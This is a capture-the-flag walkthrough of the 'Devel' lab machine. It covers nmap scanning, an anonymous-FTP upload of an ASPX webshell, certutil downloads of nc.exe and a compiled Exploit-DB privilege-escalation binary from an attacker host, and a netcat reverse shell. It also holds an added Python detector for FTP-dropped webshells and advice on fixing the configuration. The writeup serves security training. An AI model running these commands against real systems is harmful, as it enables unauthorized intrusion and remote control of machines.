Ping
ping 10.10.10.5

Nmap Initial Scan
nmap -p- --min-rate 10000 10.10.10.5 -oN inmap

Nmap Script and Service Scan
nmap 10.10.10.5 -sCV -oN snamp

FTP Enumeration

Looks like an ASP.NET website, so we will transfer our cmdasp.aspx file
put cmdasp.aspx

Now we will request cmdasp.aspx
Coooool, we got RCE
whoami
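The foothold above comes from a writable FTP directory that doubles as the IIS web root: a server-side script is uploaded over FTP and then requested over HTTP. As an added example (not from the original writeup), the following detection correlates the two, assuming simplified W3C-style FTP and web log lines that are constructed here and an attacker address that is a placeholder:

```python
import re
from datetime import datetime

# Constructed sample logs (not from the original page). Fields are a
# simplified W3C-style layout; the client IP 203.0.113.10 is a placeholder.
FTP_LOG = """\
2024-01-01 10:00:01 203.0.113.10 anonymous STOR /welcome.png 226
2024-01-01 10:00:05 203.0.113.10 anonymous STOR /cmdasp.aspx 226
2024-01-01 10:00:09 203.0.113.10 anonymous STOR /notes.txt 226
"""
WEB_LOG = """\
2024-01-01 10:00:20 203.0.113.10 GET /index.htm 200
2024-01-01 10:00:31 203.0.113.10 GET /cmdasp.aspx 200
2024-01-01 10:00:40 203.0.113.10 POST /cmdasp.aspx 200
"""

# Extensions IIS (or another web server) would execute rather than serve.
SCRIPT_EXT = (".aspx", ".asp", ".ashx", ".asmx", ".php", ".jsp")

def parse(log, fields):
    """Split each line into the named fields and attach a datetime."""
    rows = []
    for line in log.splitlines():
        parts = line.split()
        if len(parts) < len(fields):
            continue
        row = dict(zip(fields, parts))
        row["ts"] = datetime.strptime(f"{row['date']} {row['time']}",
                                      "%Y-%m-%d %H:%M:%S")
        rows.append(row)
    return rows

def find_webshell_drops(ftp_log, web_log, window_s=3600):
    """Return (path, uploader_ip, requester_ip, seconds_between) for every
    script file written via FTP STOR that is then requested over HTTP
    within window_s seconds. A hit means an uploaded file was executed
    by the web server, which is the webshell pattern shown on this page."""
    ftp_fields = ["date", "time", "ip", "user", "method", "path", "status"]
    web_fields = ["date", "time", "ip", "method", "path", "status"]
    uploads = [r for r in parse(ftp_log, ftp_fields)
               if r["method"] == "STOR"
               and r["path"].lower().endswith(SCRIPT_EXT)]
    hits = []
    for up in uploads:
        for req in parse(web_log, web_fields):
            delta = (req["ts"] - up["ts"]).total_seconds()
            if req["path"] == up["path"] and 0 <= delta <= window_s:
                hits.append((up["path"], up["ip"], req["ip"], int(delta)))
                break  # report the first request per upload
    return hits
```

The fix on the defensive side is simpler than the detection: the FTP-writable directory should not be the web root, and anonymous accounts should never have write access to one.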

We will get a reverse shell using this RCE
certutil -urlcache -f http://10.10.14.2/nc.exe c:/windows/temp/nc.exe

dir C:\windows\temp

We can see our nc.exe, so it's time to get a reverse shell
C:\windows\temp\nc.exe -e cmd.exe 10.10.14.2 443

We got a reverse shell on our listener
rlwrap nc -nvlp 443

We will check our privileges
whoami /priv
Cool, we have the impersonation privilege
But after some hard tries, I couldn't use the impersonation privilege to escalate
We will try to build an exploit for our target system instead
systeminfo
Got it, I guess; it's a vulnerable build
We will look for a public exploit for this build

We are using the Exploit-db’s exploit https://www.exploit-db.com/exploits/40564

We will compile it accordingly
i686-w64-mingw32-gcc exp.c -o exp.exe -lws2_32
I have saved the exploit code in a file named exp.c
Then I transferred the compiled exploit to the target machine
certutil -urlcache -f http://10.10.14.2:8080/exp.exe c:/users/public/exp.exe
We will run the exploit
exp.exe
Cooool, we are admin now!
Found the flags' locations
dir /s /b C:\user.txt
dir /s /b C:\root.txt

Retrieved the flags
user.txt

root.txt

Done with Devel :)